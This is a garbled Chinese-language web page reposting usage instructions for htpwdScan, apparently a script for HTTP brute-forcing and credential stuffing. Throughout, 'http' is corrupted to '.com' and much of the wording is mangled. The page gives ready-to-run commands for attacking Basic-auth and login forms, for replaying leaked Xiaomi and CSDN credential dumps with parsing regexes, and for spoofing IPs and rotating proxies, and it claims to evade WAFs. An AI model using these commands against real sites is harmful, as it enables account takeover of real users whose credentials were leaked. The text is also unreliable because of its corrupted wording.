htpwdScan 一个简单的HTTP暴力破解、撞库攻击脚本
"htpwdScan 是1个简易的.com暴力破解、撞库攻击脚本制作. 它的特点:
适用大批量校检并导进.com代理商,高频撞库能够取得成功进攻绝大多数网址,绕开绝大多数防御力对策和waf
适用立即导进互联网技术上泄漏的社工库,进行撞库攻击
适用导进超大型词典
简易实例
.com Basic验证
htpwdScan.py -u=.com://auth.58.Com/ -basic user.txt password.txt
导进登录名密码字典只能
表格破译
htpwdScan.py -f post2.txt -d user=user.txt passwd=password.txt -err=""success\"":false""
从 post2.txt 导进抓的.com包,user和passwd是必须破译的主要参数,而 user.txt password.txt 是储存了登陆密码的词典文档
success"":false 是挑选的不成功标识,标识中若有双引号,请还记得用右斜线 \ 转义
set主要参数破译
htpwdScan.py -d passwd=password.txt -u="".com://XXX.Com/index.Python?m=login&username=test&passwd=test"" -set -err=""success\"":false""
应用-set主要参数告诉他脚本制作此地是setpost请求
撞库攻击
htpwdScan.py -f=post.txt -database loginname,passwd=xiaomi.txt -regex=""(\S+)\s+(\S+)"" -err=""登录名或登陆密码不正确"" -fip
htpwdScan.py -f=post.txt -database passwd,loginname=csdn.net.sql -regex=""\S+ # (\S+) # (\S+)"" -err=""登录名或登陆密码不正确"" -fip
应用小米手机和csdn库进行撞库攻击。post.txt是抓包的.compost请求
主要参数-regex设置从文件获取主要参数的正则表达式,此地需排序,排序的方法是应用括号()
小米手机的统计数据行文件格式是 XXX@163.Com xxxxxxx 也即 (登录名)空白字符(登陆密码)
(\S+)\s+(\S+) 可特定第一位非空白字符拿来添充loginname,而下一个非空白页字符串拿来添充passwd
csdn的统计数据行文件格式是zdg # 12344321 # zdg@csdn.net . 正则表达式创作\S+ # (\S+) # (\S+)
第一位#后边的非空白页字符串添充passwd,下一个#后边的非空白页字符串添充loginname
温馨提醒,主要参数的次序是关键的
-fip 是开启仿冒任意iP
校检.com代理商
htpwdScan.py -f=post.txt -proxylist=proxies.txt -checkproxy -suc=""登录名或登陆密码不正确""
要破译某一网址,大批量检测应用代理商是不是连接总体目标网址,把.compost请求储存到post.txt,随后用-suc主要参数设置连接标识
1个简易行得通的校检方法是:
htpwdScan.py -u=.com://WWW.baidu.Com -set -proxylist=available.txt -checkproxy -suc=""搜一下""
详细主要参数表明
脚本制作适用的小作用较多,请细心阅读文章下列详细表明。提议多应用 -debug 主要参数查询.compost请求是不是不太好,一切正常再进行真实的破译。
usage: htpwdScan.py [options]
* An .com weak pass scanner. By LiJieJie *
optional arguments:
-h, --help 显示信息协助
相关文章
- 2条评论
- 末屿萌晴2022-05-28 12:30:33
- om/index.Python?m=login&username=test&passwd=test"" -set -err="
- 南殷绾痞2022-05-28 12:29:03
- 型词典 简易实例 .com Basic验证 htpwdScan.py -u=.com://auth.58.Com/ -basic user.txt password.txt 导进登录名密码字典只能 表格破译 htpwdScan.py